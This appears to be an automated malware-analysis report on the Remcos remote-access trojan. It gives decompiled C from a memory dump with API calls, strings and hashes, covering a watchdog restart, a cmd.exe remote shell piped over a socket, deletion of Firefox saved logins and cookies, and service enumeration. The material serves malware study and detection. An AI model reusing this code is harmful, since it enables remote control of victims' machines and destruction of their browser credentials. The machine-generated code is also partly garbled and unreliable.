CreateThread.KERNEL32 ref: 0040FB72
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FD3A

Strings

Remcos restarted by watchdog!, xrefs: 0040FB27
\system32, xrefs: 0040FBD0
Mutex_RemWatchdog, xrefs: 0040FB00
\svchost.exe, xrefs: 0040FC77
Watchdog launch failed!, xrefs: 0040FCE5
Watchdog module activated, xrefs: 0040FB4B, 0040FCB1
[ERROR], xrefs: 0040FCF4
WinDir, xrefs: 0040FBDF, 0040FC31
WDH, xrefs: 0040FB7C, 0040FB82, 0040FD40
[Info], xrefs: 0040FB34, 0040FB3B, 0040FB5A, 0040FCC0
\SysWOW64, xrefs: 0040FC22

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
API String ID: 3018269243-3797382479
Opcode ID: b3fb59c5ac26603edbca0cfd3d287715d0c6f2fffaadb488aa72ac04f366724a
Instruction ID: b085b79558e0c22ee18e78a7f4af536a5d5efbf70cd450b3fa531ddec726aa5e
Opcode Fuzzy Hash: b3fb59c5ac26603edbca0cfd3d287715d0c6f2fffaadb488aa72ac04f366724a
Instruction Fuzzy Hash: 545120316043015BC218BB72CC1B8AF37699E91749F50043FF946721E2EE789909C6AF

Uniqueness

Uniqueness Score: -1.00%

Function 004055EA, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283
pipesleepfileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004055EA(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x46dce8 >  *((intOrPtr*)(_t138 + 4))) {
					E0042F114(0x46dce8);
					_t160 =  *0x46dce8 - _t147;
					if( *0x46dce8 == _t147) {
						E0040484E(0, 0x46dc60, 0);
						E0042F49E(_t160, E004527B3);
						 *_t156 = 0x46dce8;
						E0042F0D5(_t147);
					}
				}
				if( *0x46dcc8 >  *((intOrPtr*)(_t138 + 4))) {
					E0042F114(0x46dcc8);
					_t162 =  *0x46dcc8 - _t147;
					if( *0x46dcc8 == _t147) {
						E004020D5(_t98, 0x46dcf0);
						E0042F49E(_t162, E004527A9);
						E0042F0D5(_t147, 0x46dcc8);
					}
				}
				_t100 =  &_v40;
				E004020D5(_t98,  &_v40);
				_t139 = 0x46c2d0;
				_v8 = _t98;
				_t163 =  *0x46bae2 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x46dcd0, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E00402084(_t98, _t156, 0x45f6bc);
						_push(0x62);
						_t147 = E00404AA4(_t98, 0x46dc60, _t136, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = E004394F6(_t100);
					_t140 = _t56;
					ReadFile( *0x46dcd0, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L004394F1(_t140);
						_t139 = 0x46c2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E00402084(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E00405A14(_t98, _t107, _t136, _t172);
						_t147 = E00404AA4(_t98, 0x46dc60, _t136, _t172, 0x62,  &_v64);
						E00401FC7();
						goto L19;
					}
					_t66 = E00439510(_t140, L00401F95( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402084(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = E00405A6F("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						E00404E0B(0x46dc60);
						CloseHandle( *0x46dcd0);
						CloseHandle( *0x46dcec);
						 *0x46bae2 = _t98;
						_t98 = 1;
						L27:
						E00401FC7();
						E00401FC7();
						return _t98;
					}
					E00405A0B(_t98, 0x46dcf0, E0043988A(_t98, _t164, "SystemDrive"));
					E00405A02(_t98, 0x46dcf0, 0x46c2d0, "\\");
					0x46dc08->nLength = 0xc;
					 *0x46dc10 = 1;
					 *0x46dc0c = _t98;
					if(CreatePipe(0x46dce4, 0x46dccc, 0x46dc08, _t98) == 0 || CreatePipe(0x46dcd0, 0x46dcec, 0x46dc08, _t98) == 0) {
						goto L27;
					} else {
						_t151 = 0x44;
						L00431F00(0x46dc18, 0x46dc18, _t98, CreatePipe);
						0x46dc18->cb = _t151;
						 *0x46dc44 = 0x101;
						 *0x46dc48 = 0;
						 *0x46dc50 =  *0x46dce4;
						_t79 =  *0x46dcec;
						 *0x46dc54 = _t79;
						 *0x46dc58 = _t79;
						_t80 = L00401F95(0x46dcf0);
						 *0x46bae2 = CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4) != 0;
						E00405A0B(_t98, 0x46c2d0, 0x45f6bc);
						 *0x46bae3 = 1;
						E0040498B(0x46dc60);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E00404A08("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
						E004020EC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4),  &_a4);
						_push(0x93);
						_t100 = 0x46dc60;
						_t147 = E00404AA4(_t98, 0x46dc60, "cmd.exe", CreateProcessA(_t98, L00401F95(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc18, 0x46dcd4));
						Sleep(0x12c);
						_t168 =  *0x46bae2 - _t98; // 0x0
						if(_t168 == 0) {
							goto L26;
						}
						_t139 = 0x46c2d0;
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							_t100 = _t139;
							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							if(E00402489() == 0) {
								_v8 = _t98;
							} else {
								E00405A02(_t98, _t139, _t139, "\n");
								L00401FAD( &_v40, _t139);
								_t52 = E00402489();
								WriteFile( *0x46dccc, L00401F95(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E00405A0B(_t98, _t139, 0x45f6bc);
							}
							Sleep(0x64);
							_t175 =  *0x46bae3 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x46dcd4->hProcess, _t98);
						CloseHandle( *0x46dcd8);
						CloseHandle( *0x46dcd4);
						goto L26;
					}
				}
			}

0x004055f3
0x004055f7
0x004055f9
0x004055fb
0x00405603
0x0040560b
0x00405612
0x00405618
0x0040561e
0x00405626
0x00405630
0x00405635
0x0040563c
0x00405641
0x0040561e
0x0040564d
0x00405655
0x0040565b
0x00405661
0x00405668
0x00405672
0x00405679
0x0040567e
0x00405661
0x0040567f
0x00405682
0x00405687
0x0040568c
0x0040568f
0x00405695
0x0040580b
0x0040580f
0x0040581c
0x00405825
0x004058c7
0x004058d1
0x004058d6
0x004058e2
0x00000000
0x004058e2
0x0040582b
0x0040582e
0x00405835
0x00405845
0x0040584e
0x004058b9
0x004058ba
0x004058c0
0x00000000
0x004058c0
0x00405853
0x00405888
0x0040588c
0x00405891
0x00405894
0x00405896
0x00405899
0x0040589a
0x0040589e
0x004058b2
0x004058b4
0x00000000
0x004058b4
0x00405862
0x00405867
0x0040586a
0x0040586c
0x00000000
0x00000000
0x00405872
0x0040587d
0x00405880
0x00405882
0x00405883
0x00000000
0x0040569b
0x0040569b
0x004056a2
0x004056a7
0x004056a9
0x00405982
0x00405987
0x00405992
0x0040599e
0x004059a4
0x004059aa
0x004059ac
0x004059af
0x004059b7
0x004059c4
0x004059c4
0x004056c2
0x004056ce
0x004056ea
0x004056f4
0x004056fe
0x00405708
0x00000000
0x00405724
0x00405726
0x0040572f
0x00405737
0x0040573f
0x00405749
0x0040575e
0x00405763
0x00405769
0x0040576e
0x00405773
0x0040579c
0x004057a3
0x004057ad
0x004057b4
0x004057c3
0x004057c4
0x004057c5
0x004057c6
0x004057ce
0x004057d3
0x004057dc
0x004057e1
0x004057e6
0x004057f2
0x004057f4
0x004057fa
0x00405800
0x00000000
0x00000000
0x00405806
0x0040580b
0x00000000
0x004058e4
0x004058ef
0x004058f2
0x004058f4
0x00405900
0x00405946
0x00405902
0x00405909
0x00405912
0x0040591e
0x00405932
0x0040593d
0x0040593f
0x0040593f
0x0040594b
0x00405951
0x00405951
0x00405964
0x00405970
0x0040597c
0x00000000
0x0040597c
0x00405708

APIs

__Init_thread_footer.LIBCMT ref: 0040563C

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

__Init_thread_footer.LIBCMT ref: 00405679
CreatePipe.KERNEL32(0046DCE4,0046DCCC,0046DC08,00000000,0045F6D4,00000000), ref: 00405704
CreatePipe.KERNEL32(0046DCD0,0046DCEC,0046DC08,00000000), ref: 0040571A
CreateProcessA.KERNEL32 ref: 0040578D
Sleep.KERNEL32(0000012C,00000093,?), ref: 004057F4
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040581C
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405845

Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4

WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 00405932
Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 0040594B
TerminateProcess.KERNEL32(00000000), ref: 00405964
CloseHandle.KERNEL32 ref: 00405970
CloseHandle.KERNEL32 ref: 0040597C
CloseHandle.KERNEL32 ref: 00405992
CloseHandle.KERNEL32 ref: 0040599E

Strings

cmd.exe, xrefs: 0040569B
SystemDrive, xrefs: 004056AF

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: a42ed005172c4764f8bd6619dc74f8f2985c3de3d202e710ebc583925a73323b
Instruction ID: 55ed603c712564892f9c2332be2a793e9955a409e8b955cd36c8b06ecb557e64
Opcode Fuzzy Hash: a42ed005172c4764f8bd6619dc74f8f2985c3de3d202e710ebc583925a73323b
Instruction Fuzzy Hash: E591D671F00208ABCB05BB659D4696F3A69EB44304B10407FF905B72E2EBF84D05DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A012, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040A012(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t134;
				void* _t135;
				void* _t136;
				void* _t137;

				_t142 = __eflags;
				_t134 = __edi;
				_t89 = __ebx;
				E004020D5(__ebx,  &_v100);
				E004020D5(__ebx,  &_v76);
				E004020D5(__ebx,  &_v28);
				_t45 = E00402084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FD1( &_v28, _t46, _t135, E004075C2(_t89,  &_v52, E0043988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
				E00401FC7();
				E00401FC7();
				_t128 =  &_v28;
				_t136 = FindFirstFileA(L00401F95(E00407558( &_v124,  &_v28, _t142, "*")),  &_v468);
				E00401FC7();
				_t143 = _t136 - 0xffffffff;
				if(_t136 != 0xffffffff) {
					while(1) {
						L15:
						__eflags = FindNextFileA(_t136,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t128 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									E00401FD1( &_v100, _t61, _t136, E00405343(_t89,  &_v52, E00407558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
									E00401FC7();
									E00401FC7();
									_t128 = E00407558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
									E00401FD1( &_v76, _t67, _t136, E00405343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
									E00401FC7();
									E00401FC7();
									_t73 = DeleteFileA(L00401F95( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(L00401F95( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E0040A6EF(_t89, _t128, __eflags);
					FindClose(_t136);
					goto L17;
				} else {
					FindClose(_t136);
					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
					E0040A6EF(_t89,  &_v28, _t143);
					L17:
					E00401FC7();
					E00401FC7();
					E00401FC7();
					return 1;
				}
			}

0x0040a012
0x0040a012
0x0040a012
0x0040a01f
0x0040a027
0x0040a02f
0x0040a03c
0x0040a05c
0x0040a064
0x0040a06c
0x0040a07d
0x0040a09a
0x0040a09c
0x0040a0a1
0x0040a0a4
0x0040a1da
0x0040a1da
0x0040a1e8
0x0040a1ea
0x00000000
0x00000000
0x0040a0cd
0x0040a0d4
0x00000000
0x00000000
0x0040a0da
0x0040a0e0
0x0040a0e3
0x0040a0f1
0x0040a0f1
0x0040a0f7
0x0040a0f7
0x0040a0f9
0x0040a0f9
0x0040a0fd
0x0040a102
0x0040a105
0x0040a10b
0x00000000
0x00000000
0x0040a10d
0x0040a10e
0x0040a111
0x00000000
0x00000000
0x0040a113
0x0040a11c
0x0040a11c
0x0040a11e
0x0040a14e
0x0040a156
0x0040a161
0x0040a17e
0x0040a190
0x0040a19b
0x0040a1a3
0x0040a1b1
0x0040a1b7
0x0040a1b9
0x0040a1bb
0x0040a1bb
0x0040a1ca
0x0040a1d0
0x0040a1d2
0x0040a1d4
0x0040a1d4
0x0040a1d2
0x00000000
0x0040a11e
0x0040a117
0x0040a119
0x0040a119
0x00000000
0x0040a119
0x0040a0e9
0x0040a0eb
0x00000000
0x00000000
0x00000000
0x0040a0eb
0x0040a1fa
0x0040a1ff
0x0040a208
0x00000000
0x0040a0aa
0x0040a0ab
0x0040a0bb
0x0040a0c0
0x0040a20e
0x0040a211
0x0040a219
0x0040a221
0x0040a22c
0x0040a22c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
FindClose.KERNEL32(00000000), ref: 0040A0AB
FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
FindClose.KERNEL32(00000000), ref: 0040A208

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A034
[Firefox StoredLogins not found], xrefs: 0040A0B6
[Firefox StoredLogins Cleared!], xrefs: 0040A1F5
\key3.db, xrefs: 0040A16C
\logins.json, xrefs: 0040A12A
UserProfile, xrefs: 0040A042

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: 7211f678bce55bba0cd1d63af98ad6c2c4189c5a55d84edd23214396f15f50ab
Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
Opcode Fuzzy Hash: 7211f678bce55bba0cd1d63af98ad6c2c4189c5a55d84edd23214396f15f50ab
Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A22D, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040A22D(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t56;
				signed int _t57;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t116 = __eflags;
				_t108 = __edi;
				E004020D5(0,  &_v52);
				E004020D5(0,  &_v28);
				_t35 = E00402084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FD1( &_v28, _t36, _t109, E004075C2(0,  &_v76, E0043988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
				E00401FC7();
				E00401FC7();
				_t104 =  &_v28;
				_t110 = FindFirstFileA(L00401F95(E00407558( &_v100,  &_v28, _t116, "*")),  &_v444);
				E00401FC7();
				_t117 = _t110 - 0xffffffff;
				if(_t110 != 0xffffffff) {
					__eflags = FindNextFileA(_t110,  &_v444);
					if(__eflags == 0) {
						L17:
						E00402084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
						E0040A6EF(0, _t104, __eflags);
						FindClose(_t110);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t104 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E00407558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											E00401FD1( &_v52, _t59, _t110, E00405343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											E00401FC7();
											E00401FC7();
											__eflags = DeleteFileA(L00401F95( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402084(0, _t102);
					E0040A6EF(0, _t104, _t117);
					L18:
				}
				L19:
				E00401FC7();
				E00401FC7();
				return 1;
			}

0x0040a22d
0x0040a22d
0x0040a23b
0x0040a243
0x0040a250
0x0040a270
0x0040a278
0x0040a280
0x0040a291
0x0040a2ae
0x0040a2b0
0x0040a2b5
0x0040a2b8
0x0040a2eb
0x0040a2ed
0x0040a3b9
0x0040a3c3
0x0040a3c8
0x0040a3d1
0x00000000
0x0040a2f3
0x0040a2f3
0x0040a2f5
0x0040a2f5
0x0040a2fc
0x00000000
0x0040a302
0x0040a302
0x0040a308
0x0040a30b
0x0040a319
0x0040a319
0x0040a31f
0x0040a321
0x0040a321
0x0040a325
0x0040a32a
0x0040a32d
0x0040a333
0x00000000
0x00000000
0x0040a335
0x0040a336
0x0040a339
0x00000000
0x0040a33b
0x0040a33b
0x0040a33b
0x0040a344
0x0040a344
0x0040a346
0x00000000
0x0040a348
0x0040a360
0x0040a36f
0x0040a377
0x0040a37f
0x0040a393
0x0040a395
0x0040a3fd
0x0040a3ff
0x00000000
0x0040a397
0x0040a397
0x0040a39e
0x0040a3a1
0x0040a3f2
0x00000000
0x00000000
0x00000000
0x0040a3a1
0x0040a395
0x00000000
0x0040a346
0x0040a33f
0x0040a341
0x0040a341
0x00000000
0x0040a30d
0x0040a311
0x0040a313
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a313
0x0040a30b
0x00000000
0x0040a3a3
0x0040a3b1
0x0040a3b1
0x00000000
0x0040a2f5
0x0040a2ba
0x0040a2bb
0x0040a2c4
0x0040a2c6
0x0040a2cb
0x0040a2cb
0x0040a2d0
0x0040a3d7
0x0040a3d7
0x0040a3d9
0x0040a3dc
0x0040a3e4
0x0040a3f0

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
FindClose.KERNEL32(00000000), ref: 0040A2BB
FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
GetLastError.KERNEL32 ref: 0040A397
FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
FindClose.KERNEL32(00000000), ref: 0040A3D1
FindClose.KERNEL32(00000000), ref: 0040A3F2

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040A248
[Firefox Cookies not found], xrefs: 0040A2C6, 0040A3BE
[Firefox cookies found, cleared!], xrefs: 0040A3FF
UserProfile, xrefs: 0040A256
\cookies.sqlite, xrefs: 0040A34E

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Find$File$Close$Next$DeleteErrorFirstLast
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 532992503-432212279
Opcode ID: a869c801c1e13f68448cdbd77196949946ba1128e16313e5d789613cf0112277
Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
Opcode Fuzzy Hash: a869c801c1e13f68448cdbd77196949946ba1128e16313e5d789613cf0112277
Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 004160DB, Relevance: 15.2, APIs: 10, Instructions: 226
serviceCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004160DB(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					L00401F6D(_t133,  &_v88);
					_v12 = 0;
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E0040331A(_t133, _t198, __eflags,  &_v88);
						L00401EF0();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
					_push(_t201);
					_t87 = E004394F6( &_v88);
					_v36 = _t87;
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L004394F1(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E00403311(E00404405(_t133,  &_v112, _t199[1], __eflags, E0040427F(_t133,  &_v64, 0x4659c4)));
						L00401EF0();
						L00401EF0();
						E00403311(E00404405(_t133,  &_v64,  *_t199, __eflags, E0040427F(_t133,  &_v112, 0x4659c4)));
						L00401EF0();
						L00401EF0();
						_t100 = E0040427F(_t133,  &_v136, 0x4659c4);
						E00403311(E00403030( &_v64, E0041729F(_t133,  &_v112, _t199[3]), _t100));
						L00401EF0();
						L00401EF0();
						L00401EF0();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = E004394F6( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *_v24), _t199, __eflags, 0x4659c4));
								L00401EF0();
								L00401EF0();
								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x4659c4));
								L00401EF0();
								L00401EF0();
								E00403311(E004030A6(_t133,  &_v136, E00404405(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0040427F(_t133,  &_v112, 0x4659c4)), _t199, __eflags, "\n"));
								L00401EF0();
								L00401EF0();
								L00401EF0();
								L004394F1(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						__eflags = _t202 - _v8;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E0040427F(_t133, _t198, 0x45f724);
				goto L13;
			}

0x004160eb
0x004160ef
0x004160f8
0x004160fc
0x00416112
0x0041611a
0x00416121
0x00416128
0x0041613f
0x00416141
0x0041638a
0x0041638b
0x00416397
0x0041639f
0x004163a4
0x004163ac
0x004163ac
0x0041614d
0x00416152
0x00000000
0x00000000
0x00416158
0x0041615b
0x0041615c
0x00416165
0x00416178
0x0041617e
0x00416180
0x00416183
0x00416186
0x00416381
0x00416384
0x00000000
0x00416389
0x0041618c
0x0041618f
0x004161ad
0x004161b5
0x004161bd
0x004161df
0x004161e7
0x004161ef
0x004161ff
0x0041621f
0x00416227
0x0041622f
0x0041623a
0x0041623f
0x00416248
0x00416251
0x0041625b
0x00416261
0x00416263
0x00416269
0x0041626f
0x00416272
0x00416278
0x0041627b
0x00416282
0x0041628a
0x00416291
0x004162b8
0x004162c3
0x004162cb
0x004162f2
0x004162fd
0x00416305
0x0041633b
0x00416346
0x0041634e
0x00416356
0x0041635c
0x00416361
0x00416364
0x00416272
0x00416368
0x0041636e
0x0041636f
0x00416372
0x00416375
0x00416375
0x0041637e
0x00000000
0x0041637e
0x00416105
0x00000000

APIs

